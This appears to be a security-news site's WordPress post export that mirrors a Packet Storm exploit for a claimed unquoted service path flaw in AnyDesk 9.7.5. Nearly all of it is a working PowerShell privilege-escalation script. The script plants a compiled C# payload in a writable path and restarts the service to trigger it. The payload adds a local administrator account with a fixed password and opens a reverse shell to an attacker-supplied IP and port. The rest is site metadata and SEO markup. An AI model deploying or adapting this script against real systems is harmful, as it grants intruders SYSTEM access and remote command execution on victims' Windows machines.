{"id":63181,"date":"2026-06-16T11:46:35","date_gmt":"2026-06-16T11:46:35","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=63181"},"modified":"2026-06-16T11:46:35","modified_gmt":"2026-06-16T11:46:35","slug":"anydesk-975-unquoted-service-path","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=63181","title":{"rendered":"\ud83d\udcc4 AnyDesk 9.7.5 Unquoted Service Path_PACKETSTORM:223513"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-06-16T16:01:24&#8243;,&#8221;description&#8221;:&#8221;AnyDesk version 9.7.5 unquoted service path privilege escalation to SYSTEM exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-06-16T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-06-16T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 AnyDesk 9.7.5 Unquoted Service Path&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:223513&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;==================================================================================================================================\\n    | # Title     : AnyDesk v9.7.5 Unquoted Service Path Privilege Escalation to SYSTEM                                              |\\n    | # Author    : indoushka                                                                                                        |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 151.0.3 (64 bits)                                                 |\\n    | # Vendor    : https:\/\/anydesk.com\/en                                                                                           |\\n    ==================================================================================================================================\\n    \\n    [+] Summary    : This script exploits the unquoted service path vulnerability in AnyDesk to escalate privileges to SYSTEM.\\n    \\n    [+] POC        :  \\n    \\n    \\u003c#\\n    .SYNOPSIS\\n    .EXAMPLE\\n    .\\\\AnyDesk_LPE_fixed.ps1\\n    .\\\\AnyDesk_LPE_fixed.ps1 -AttackerIP 10.0.0.5 -AttackerPort 4444\\n    .\\\\AnyDesk_LPE_fixed.ps1 -Cleanup\\n    #\\u003e\\n    \\n    param(\\n        [string]$AttackerIP = \\&#8221;127.0.0.1\\&#8221;,\\n        [int]$AttackerPort = 4444,\\n        [string]$PayloadPath = \\&#8221;\\&#8221;,\\n        [switch]$Cleanup,\\n        [switch]$RestoreService,\\n        [switch]$Verbose\\n    )\\n    \\n    function Write-ColorOutput {\\n        param(\\n            [string]$Message,\\n            [string]$Color = \\&#8221;White\\&#8221;\\n        )\\n        $colors = @{\\n            \\&#8221;SUCCESS\\&#8221; = \\&#8221;Green\\&#8221;\\n            \\&#8221;ERROR\\&#8221; = \\&#8221;Red\\&#8221;\\n            \\&#8221;WARNING\\&#8221; = \\&#8221;Yellow\\&#8221;\\n            \\&#8221;INFO\\&#8221; = \\&#8221;Cyan\\&#8221;\\n            \\&#8221;DEBUG\\&#8221; = \\&#8221;DarkGray\\&#8221;\\n        }\\n        $colorName = if ($colors.ContainsKey($Color)) { $colors[$Color] } else { $Color }\\n        Write-Host \\&#8221;[$(Get-Date -Format &#8216;HH:mm:ss&#8217;)] $Message\\&#8221; -ForegroundColor $colorName\\n    }\\n    \\n    function Test-WriteAccess {\\n        param([string]$DirectoryPath)\\n        \\n        try {\\n            if (-not (Test-Path $DirectoryPath)) {\\n                return $false\\n            }\\n            \\n            $testFile = Join-Path $DirectoryPath \\&#8221;.write_test_$(Get-Random).tmp\\&#8221;\\n            [System.IO.File]::WriteAllText($testFile, \\&#8221;test\\&#8221;)\\n            Remove-Item $testFile -Force -ErrorAction SilentlyContinue\\n            return $true\\n        } catch {\\n            return $false\\n        }\\n    }\\n    \\n    function Test-PathWritable {\\n        param([string]$FilePath)\\n        \\n        $directory = [System.IO.Path]::GetDirectoryName($FilePath)\\n        \\n        if (-not (Test-Path $directory)) {\\n            return $false\\n        }\\n    \\n        if (Test-WriteAccess $directory) {\\n            return $true\\n        }\\n    \\n        try {\\n            $acl = Get-Acl $directory -ErrorAction SilentlyContinue\\n            $currentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent().User\\n            \\n            foreach ($access in $acl.Access) {\\n                if ($access.IdentityReference.Value -eq $currentUser.Value -or \\n                    $access.IdentityReference.Value -eq \\&#8221;BUILTIN\\\\Users\\&#8221;) {\\n                    \\n                    if (($access.FileSystemRights -band [System.Security.AccessControl.FileSystemRights]::Write) -and\\n                        $access.AccessControlType -eq \\&#8221;Allow\\&#8221;) {\\n                        return $true\\n                    }\\n                }\\n            }\\n        } catch { }\\n        \\n        return $false\\n    }\\n    \\n    function Test-SystemPrivileges {\\n        $identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()\\n    \\n        if ($identity.User.Value -eq \\&#8221;S-1-5-18\\&#8221;) {\\n            return $true\\n        }\\n    \\n        $principal = New-Object System.Security.Principal.WindowsPrincipal($identity)\\n        return $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)\\n    }\\n    \\n    function Find-AnyDeskService {\\n        $services = Get-CimInstance -ClassName Win32_Service\\n        \\n        $possibleNames = @(\\&#8221;anydesk\\&#8221;, \\&#8221;AnyDeskService\\&#8221;, \\&#8221;AnyDesk\\&#8221;, \\&#8221;AD Service\\&#8221;)\\n        \\n        foreach ($name in $possibleNames) {\\n            $service = $services | Where-Object { \\n                $_.Name -like \\&#8221;*$name*\\&#8221; -or \\n                $_.DisplayName -like \\&#8221;*AnyDesk*\\&#8221; -or\\n                $_.PathName -like \\&#8221;*AnyDesk*\\&#8221;\\n            }\\n            \\n            if ($service) {\\n    \\n                $binPath = $service.PathName -replace &#8216;^\\&#8221;|\\&#8221;$&#8217;, &#8221;\\n                $executable = ($binPath -split &#8216; &#8216;)[0]\\n                \\n                if (Test-Path $executable) {\\n                    $versionInfo = Get-ItemProperty -Path $executable -ErrorAction SilentlyContinue\\n                    if ($versionInfo) {\\n                        $version = $versionInfo.VersionInfo.ProductVersion\\n                        Write-ColorOutput \\&#8221;Found AnyDesk version: $version\\&#8221; \\&#8221;INFO\\&#8221;\\n                    }\\n                }\\n                \\n                return $service\\n            }\\n        }\\n        \\n        return $null\\n    }\\n    \\n    function Test-UnquotedServicePath {\\n        param([object]$Service)\\n        \\n        if ($Service -eq $null) { return $false }\\n        \\n        $binPath = $Service.PathName\\n        Write-ColorOutput \\&#8221;Binary path: $binPath\\&#8221; \\&#8221;DEBUG\\&#8221;\\n    \\n        $exePath = if ($binPath -match &#8216;^\\&#8221;([^\\&#8221;]*)\\&#8221;&#8216;) {\\n            $matches[1]\\n        } else {\\n            ($binPath -split &#8216; &#8216;)[0]\\n        }\\n        \\n        Write-ColorOutput \\&#8221;Executable path: $exePath\\&#8221; \\&#8221;DEBUG\\&#8221;\\n    \\n        if (-not (Test-Path $exePath -PathType Leaf)) {\\n            Write-ColorOutput \\&#8221;Executable not found\\&#8221; \\&#8221;WARNING\\&#8221;\\n            return $false\\n        }\\n    \\n        $isUnquoted = ($exePath -match \\&#8221; \\&#8221; -and $binPath -notmatch &#8216;^\\&#8221;.*\\&#8221;$&#8217;)\\n        \\n        if (-not $isUnquoted) {\\n            return $false\\n        }\\n    \\n        $directory = [System.IO.Path]::GetDirectoryName($exePath)\\n        \\n        if (Test-WriteAccess $directory) {\\n            Write-ColorOutput \\&#8221;Write access confirmed to $directory\\&#8221; \\&#8221;SUCCESS\\&#8221;\\n            return $true\\n        }\\n        \\n        Write-ColorOutput \\&#8221;No write access to $directory\\&#8221; \\&#8221;WARNING\\&#8221;\\n        return $false\\n    }\\n    \\n    function Get-VulnerablePaths {\\n        param([object]$Service)\\n        \\n        $vulnerablePaths = @()\\n        \\n        if ($Service -eq $null) { return $vulnerablePaths }\\n        \\n        $binPath = $Service.PathName -replace &#8216;^\\&#8221;|\\&#8221;$&#8217;, &#8221;\\n        $exePath = ($binPath -split &#8216; &#8216;)[0]\\n        \\n        if ($exePath -notmatch \\&#8221; \\&#8221;) { return $vulnerablePaths }\\n    \\n        $current = $exePath\\n        \\n        while ($current) {\\n            $parent = [System.IO.Path]::GetDirectoryName($current)\\n            $filename = [System.IO.Path]::GetFileName($current)\\n            \\n            if ([string]::IsNullOrEmpty($filename) -or $filename -eq $current) { break }\\n    \\n            if ($filename -match \\&#8221; \\&#8221; -and (Test-Path $parent -PathType Container)) {\\n    \\n                $execName = ($filename -split &#8216; &#8216;)[0]\\n                $vulnPath = Join-Path $parent \\&#8221;$execName.exe\\&#8221;\\n    \\n                if (Test-PathWritable $vulnPath) {\\n                    Write-ColorOutput \\&#8221;Found vulnerable path: $vulnPath\\&#8221; \\&#8221;INFO\\&#8221;\\n                    $vulnerablePaths += $vulnPath\\n                }\\n            }\\n            \\n            $current = $parent\\n        }\\n        \\n        return $vulnerablePaths\\n    }\\n    \\n    function New-MaliciousExecutable {\\n        param(\\n            [string]$Path,\\n            [string]$AttackerIP,\\n            [int]$AttackerPort,\\n            [string]$CustomPayloadPath\\n        )\\n        \\n    \\n        if ($CustomPayloadPath -and (Test-Path $CustomPayloadPath)) {\\n            try {\\n                Copy-Item -Path $CustomPayloadPath -Destination $Path -Force -ErrorAction Stop\\n                Write-ColorOutput \\&#8221;Custom payload copied to $Path\\&#8221; \\&#8221;SUCCESS\\&#8221;\\n                return $true\\n            } catch {\\n                Write-ColorOutput \\&#8221;Failed to copy custom payload: $($_.Exception.Message)\\&#8221; \\&#8221;ERROR\\&#8221;\\n                # Fall through to create our own\\n            }\\n        }\\n        \\n        Write-ColorOutput \\&#8221;Creating malicious executable: $Path\\&#8221; \\&#8221;INFO\\&#8221;\\n    \\n        $csharpCode = @\\&#8221;\\n    using System;\\n    using System.Diagnostics;\\n    using System.Net.Sockets;\\n    using System.Text;\\n    \\n    class Program {\\n        static void Main() {\\n            try {\\n    \\n                ProcessStartInfo psi = new ProcessStartInfo {\\n                    FileName = \\&#8221;cmd.exe\\&#8221;,\\n                    Arguments = \\&#8221;\/c net user hacker P@ssw0rd123! \/add \\u0026\\u0026 net localgroup administrators hacker \/add\\&#8221;,\\n                    UseShellExecute = false,\\n                    RedirectStandardOutput = true,\\n                    CreateNoWindow = true\\n                };\\n                \\n                Process p = Process.Start(psi);\\n                p.WaitForExit();\\n    \\n                TcpClient client = new TcpClient(\\&#8221;$AttackerIP\\&#8221;, $AttackerPort);\\n                NetworkStream stream = client.GetStream();\\n                \\n                byte[] buffer = new byte[4096];\\n                while (true) {\\n                    int bytesRead = stream.Read(buffer, 0, buffer.Length);\\n                    if (bytesRead == 0) break;\\n                    \\n                    string command = Encoding.ASCII.GetString(buffer, 0, bytesRead);\\n                    ProcessStartInfo psi2 = new ProcessStartInfo {\\n                        FileName = \\&#8221;cmd.exe\\&#8221;,\\n                        Arguments = \\&#8221;\/c \\&#8221; + command,\\n                        UseShellExecute = false,\\n                        RedirectStandardOutput = true,\\n                        CreateNoWindow = true\\n                    };\\n                    \\n                    Process p2 = Process.Start(psi2);\\n                    string output = p2.StandardOutput.ReadToEnd();\\n                    p2.WaitForExit();\\n                    \\n                    stream.Write(Encoding.ASCII.GetBytes(output), 0, output.Length);\\n                }\\n            } catch { }\\n        }\\n    }\\n    \\&#8221;@\\n        \\n        # Find C# compiler\\n        $cscPaths = @(\\n            \\&#8221;C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\\&#8221;,\\n            \\&#8221;C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\csc.exe\\&#8221;\\n        )\\n        \\n        $cscPath = $null\\n        foreach ($path in $cscPaths) {\\n            if (Test-Path $path) {\\n                $cscPath = $path\\n                break\\n            }\\n        }\\n        \\n        if (-not $cscPath) {\\n            Write-ColorOutput \\&#8221;C# compiler not found. Creating simple batch file instead.\\&#8221; \\&#8221;WARNING\\&#8221;\\n            $batchContent = \\&#8221;@echo off`r`nwhoami \\u003e C:\\\\temp\\\\anydesk_lpe.txt`r`nnet user hacker P@ssw0rd123! \/add`r`nnet localgroup administrators hacker \/add\\&#8221;\\n            [System.IO.File]::WriteAllText($Path, $batchContent)\\n            return (Test-Path $Path)\\n        }\\n    \\n        $tempCS = [System.IO.Path]::GetTempFileName() + \\&#8221;.cs\\&#8221;\\n        [System.IO.File]::WriteAllText($tempCS, $csharpCode)\\n        \\n        \\u0026 $cscPath \/out:\\&#8221;$Path\\&#8221; \/target:exe $tempCS 2\\u003e$null\\n        \\n        Remove-Item $tempCS -Force -ErrorAction SilentlyContinue\\n        \\n        return (Test-Path $Path)\\n    }\\n    \\n    function Stop-ServiceSafely {\\n        param([string]$Name)\\n        \\n        Write-ColorOutput \\&#8221;Stopping $Name service&#8230;\\&#8221; \\&#8221;INFO\\&#8221;\\n        \\n        try {\\n            $service = Get-Service -Name $Name -ErrorAction SilentlyContinue\\n            if ($service -eq $null) { return $false }\\n            \\n            # Check dependencies\\n            $dependencies = Get-Service -Name $Name -DependentServices -ErrorAction SilentlyContinue\\n            if ($dependencies.Count -gt 0) {\\n                Write-ColorOutput \\&#8221;Service has $($dependencies.Count) dependencies\\&#8221; \\&#8221;DEBUG\\&#8221;\\n            }\\n    \\n            for ($i = 0; $i -lt 5; $i++) {\\n                Stop-Service -Name $Name -Force -ErrorAction SilentlyContinue\\n                Start-Sleep -Milliseconds 500\\n                \\n                $svc = Get-Service -Name $Name -ErrorAction SilentlyContinue\\n                if ($svc -and $svc.Status -eq \\&#8221;Stopped\\&#8221;) {\\n                    Write-ColorOutput \\&#8221;Service stopped\\&#8221; \\&#8221;SUCCESS\\&#8221;\\n                    return $true\\n                }\\n            }\\n            \\n            return $false\\n        } catch {\\n            Write-ColorOutput \\&#8221;Failed to stop service: $($_.Exception.Message)\\&#8221; \\&#8221;ERROR\\&#8221;\\n            return $false\\n        }\\n    }\\n    \\n    function Start-ServiceSafely {\\n        param([string]$Name)\\n        \\n        Write-ColorOutput \\&#8221;Starting $Name service&#8230;\\&#8221; \\&#8221;INFO\\&#8221;\\n        \\n        try {\\n            for ($i = 0; $i -lt 3; $i++) {\\n                Start-Service -Name $Name -ErrorAction SilentlyContinue\\n                Start-Sleep -Seconds 2\\n                \\n                $svc = Get-Service -Name $Name -ErrorAction SilentlyContinue\\n                if ($svc -and $svc.Status -eq \\&#8221;Running\\&#8221;) {\\n                    Write-ColorOutput \\&#8221;Service started\\&#8221; \\&#8221;SUCCESS\\&#8221;\\n                    return $true\\n                }\\n            }\\n            \\n            return $false\\n        } catch {\\n            Write-ColorOutput \\&#8221;Failed to start service: $($_.Exception.Message)\\&#8221; \\&#8221;ERROR\\&#8221;\\n            return $false\\n        }\\n    }\\n    \\n    function Remove-FileWithRetry {\\n        param([string]$Path)\\n        \\n        if (-not (Test-Path $Path)) { return $true }\\n        \\n        for ($i = 0; $i -lt 5; $i++) {\\n            try {\\n                Remove-Item -Path $Path -Force -ErrorAction Stop\\n                return $true\\n            } catch {\\n                if ($i -lt 4) {\\n                    Start-Sleep -Seconds 1\\n                }\\n            }\\n        }\\n        \\n        Write-ColorOutput \\&#8221;Could not delete $Path (may be in use)\\&#8221; \\&#8221;WARNING\\&#8221;\\n        return $false\\n    }\\n    \\n    function Invoke-AnyDeskLPE {\\n        Write-ColorOutput @\\&#8221;\\n    \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n    \u2551  AnyDesk v9.7.5 &#8211; Unquoted Service Path Privilege Escalation     \u2551\\n    \u2551           Local Privilege Escalation to SYSTEM                   \u2551\\n    \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n    \\&#8221;@ \\&#8221;INFO\\&#8221;\\n        \\n        Write-ColorOutput \\&#8221;Target: $env:COMPUTERNAME\\&#8221; \\&#8221;INFO\\&#8221;\\n        Write-ColorOutput \\&#8221;User: $env:USERNAME\\&#8221; \\&#8221;INFO\\&#8221;\\n    \\n        if (Test-SystemPrivileges) {\\n            Write-ColorOutput \\&#8221;Already running as SYSTEM!\\&#8221; \\&#8221;SUCCESS\\&#8221;\\n            return $true\\n        }\\n    \\n        $service = Find-AnyDeskService\\n        if ($service -eq $null) {\\n            Write-ColorOutput \\&#8221;AnyDesk service not found\\&#8221; \\&#8221;ERROR\\&#8221;\\n            return $false\\n        }\\n        \\n        Write-ColorOutput \\&#8221;Service found: $($service.Name)\\&#8221; \\&#8221;SUCCESS\\&#8221;\\n    \\n        if (-not (Test-UnquotedServicePath -Service $service)) {\\n            Write-ColorOutput \\&#8221;Service is not vulnerable (path is quoted or no write access)\\&#8221; \\&#8221;ERROR\\&#8221;\\n            return $false\\n        }\\n    \\n        $vulnerablePaths = Get-VulnerablePaths -Service $service\\n        \\n        if ($vulnerablePaths.Count -eq 0) {\\n            Write-ColorOutput \\&#8221;No vulnerable paths found\\&#8221; \\&#8221;ERROR\\&#8221;\\n            return $false\\n        }\\n        \\n        Write-ColorOutput \\&#8221;Found vulnerable paths:\\&#8221; \\&#8221;SUCCESS\\&#8221;\\n        foreach ($path in $vulnerablePaths) {\\n            Write-ColorOutput \\&#8221;  $path\\&#8221; \\&#8221;INFO\\&#8221;\\n        }\\n    \\n        $targetPath = $vulnerablePaths[0]\\n    \\n        if (-not (New-MaliciousExecutable -Path $targetPath -AttackerIP $AttackerIP -AttackerPort $AttackerPort -CustomPayloadPath $PayloadPath)) {\\n            Write-ColorOutput \\&#8221;Failed to create malicious executable\\&#8221; \\&#8221;ERROR\\&#8221;\\n            return $false\\n        }\\n        \\n        Write-ColorOutput \\&#8221;Malicious executable created at: $targetPath\\&#8221; \\&#8221;SUCCESS\\&#8221;\\n    \\n        if (Stop-ServiceSafely -Name $service.Name) {\\n            Write-ColorOutput \\&#8221;Payload trigger initiated\\&#8221; \\&#8221;SUCCESS\\&#8221;\\n    \\n            Start-Sleep -Seconds 5\\n    \\n            if ($RestoreService) {\\n                Start-ServiceSafely -Name $service.Name\\n            }\\n        } else {\\n            Write-ColorOutput \\&#8221;Could not stop service. Manual trigger may be needed.\\&#8221; \\&#8221;WARNING\\&#8221;\\n        }\\n        \\n        Write-ColorOutput \\&#8221;Exploit completed\\&#8221; \\&#8221;SUCCESS\\&#8221;\\n        return $true\\n    }\\n    \\n    function Invoke-Cleanup {\\n        Write-ColorOutput \\&#8221;Cleaning up&#8230;\\&#8221; \\&#8221;INFO\\&#8221;\\n        $pathsToClean = @(\\n            \\&#8221;C:\\\\Program.exe\\&#8221;,\\n            \\&#8221;C:\\\\Program Files.exe\\&#8221;,\\n            \\&#8221;C:\\\\Program Files (x86)\\\\AnyDesk\\\\Program.exe\\&#8221;\\n        )\\n        foreach ($path in $pathsToClean) {\\n            if (Test-Path $path) {\\n                Remove-FileWithRetry -Path $path\\n            }\\n        }\\n        Write-ColorOutput \\&#8221;Cleanup completed\\&#8221; \\&#8221;SUCCESS\\&#8221;\\n    }\\n    $result = Invoke-AnyDeskLPE\\n    \\n    if ($Cleanup) {\\n        Invoke-Cleanup\\n    }\\n    exit (-not $result)\\n    \\n    Greetings to :==============================================================================\\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n    ============================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/223513&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/223513\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-06-16T16:01:24&#8243;,&#8221;description&#8221;:&#8221;AnyDesk version 9.7.5 unquoted service path privilege escalation to SYSTEM exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-06-16T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-06-16T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 AnyDesk 9.7.5 Unquoted Service Path&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:223513&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;==================================================================================================================================\\n | # Title : AnyDesk v9.7.5 Unquoted Service Path&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-63181","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 AnyDesk 9.7.5 Unquoted Service Path_PACKETSTORM:223513 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=63181\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 AnyDesk 9.7.5 Unquoted Service Path_PACKETSTORM:223513 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-06-16T16:01:24&#8243;,&#8221;description&#8221;:&#8221;AnyDesk version 9.7.5 unquoted service path privilege escalation to SYSTEM exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-06-16T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-06-16T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 AnyDesk 9.7.5 Unquoted Service Path&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:223513&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;==================================================================================================================================n | # Title : AnyDesk v9.7.5 Unquoted Service Path...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=63181\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-06-16T11:46:35+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"9 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=63181#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=63181\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 AnyDesk 9.7.5 Unquoted Service Path_PACKETSTORM:223513\",\"datePublished\":\"2026-06-16T11:46:35+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=63181\"},\"wordCount\":1780,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=63181#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=63181\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=63181\",\"name\":\"\ud83d\udcc4 AnyDesk 9.7.5 Unquoted Service Path_PACKETSTORM:223513 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-06-16T11:46:35+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=63181#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=63181\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=63181#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 AnyDesk 9.7.5 Unquoted Service Path_PACKETSTORM:223513\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero 